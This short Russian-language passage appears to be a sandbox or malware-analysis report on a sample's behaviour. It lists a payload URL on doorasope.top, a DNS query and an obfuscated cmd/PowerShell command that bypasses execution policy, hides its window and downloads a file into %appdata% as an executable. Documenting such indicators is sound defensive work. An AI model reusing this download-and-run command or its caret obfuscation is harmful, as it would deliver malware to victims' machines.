Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PoW^ers^HelL.ex^E -Exe^cuT^i^oNPOL^ICY ^bYpA^S^S -noP^RofilE -wIND^ow^S^tYle hidd^En^ ^(^new^-oB^jECt^ ^SysT^EM^.^N^Et.WeBC^LIe^nt).Do^wNloADfilE('http://www.doorasope.top/rea...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "PoW^ers^HelL.ex^E -Exe^cuT^i^oNPOL^ICY ^bYpA^S^S -noP^RofilE -wIND^ow^S^tYle hidd^En^ ^(^new^-oB^jECt^ ^SysT^EM^.^N^Et.WeBC^LIe^nt).Do^wNloADfilE('http://www.doorasope.top/rea...' (со скрытым окном)